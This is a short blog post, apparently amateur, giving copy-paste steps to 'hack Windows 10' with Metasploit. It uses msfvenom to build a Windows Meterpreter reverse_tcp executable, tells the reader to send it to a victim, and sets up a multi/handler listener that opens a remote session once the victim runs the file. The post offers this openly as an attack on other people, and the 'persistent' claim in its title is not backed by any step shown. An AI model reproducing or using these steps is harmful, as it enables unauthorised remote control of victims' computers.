Windows 10 Hacked. Persistent Attack using Metasploit (kali linux)
![]() |
Hello everyone, I already posted about metasploit and how to hack android device using metasploit framework console. If you want to post , click here.
But today I will explain how to hack windows 10 lifelong hack using metasploit framework. It ike that hack android device. It is very simple method. So read full post. You just copy and paste the commands in your terminal.
You use kali linux os for better than termux. I tried in termux. But termux has some problems in hacking.
Now create payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= port number -f exe>filename.exe
Run this command and wait for 2 minutes.
Now payload was created.
open your [ Metasploit-framework/bin/ ] Folder check your exe file
Now send the exe file to victi
Now Open Metasploit Framework
Open command prompt in this path [ Metasploit-framework/bin/ ]
msfconsole (if not work give this command msfconsole.bat )
Now Metasploit framework opened
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST < yourip>
set LPORT <port number>
exploit
Now started reverse tcp handler : 4444
Now the server is waiting for the victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )
Now Meterpreter session opened
Type "help" command to know all commands.
0 Comments